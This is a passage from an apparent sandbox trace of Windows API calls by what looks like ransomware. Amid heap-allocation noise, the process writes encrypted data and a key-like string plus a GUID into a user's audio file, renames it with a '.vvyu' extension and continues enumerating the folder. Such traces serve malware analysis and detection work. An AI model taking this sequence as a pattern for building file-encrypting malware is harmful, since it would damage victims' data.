hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f300 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f348 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.148] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0199.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea30c8 [0199.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0199.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0199.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.158] GetCurrentThreadId () returned 0x66c [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6340 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.159] GetCurrentThreadId () returned 0x66c [0199.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0199.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3170 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3188 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0199.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f348 | out: hHeap=0x620000) returned 1 [0199.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.171] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x3006, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x3006, lpOverlapped=0x0) returned 1 [0199.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.172] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x300b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.172] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.173] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.174] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.174] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.174] CloseHandle (hObject=0x510) returned 1 [0199.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0199.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.176] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rp0gg8vJq4U.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\rp0gg8vjq4u.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rp0gg8vJq4U.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\rp0gg8vjq4u.wav.vvyu")) returned 1 [0199.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.177] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0199.180] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffece30, ftCreationTime.dwHighDateTime=0x1d89a0a, ftLastAccessTime.dwLowDateTime=0x689408f0, ftLastAccessTime.dwHighDateTime=0x1d8a4a9, ftLastWriteTime.dwLowDateTime=0x689408f0, ftLastWriteTime.dwHighDateTime=0x1d8a4a9, nFileSizeHigh=0x0, nFileSizeLow=0x300b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rp0gg8vJq4U.wav", cAlternateFileName="RP0GG8~1.WAV")) returned 0 [0199.180] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0199.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0199.181] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0199.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0199.181] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0199.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0199.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 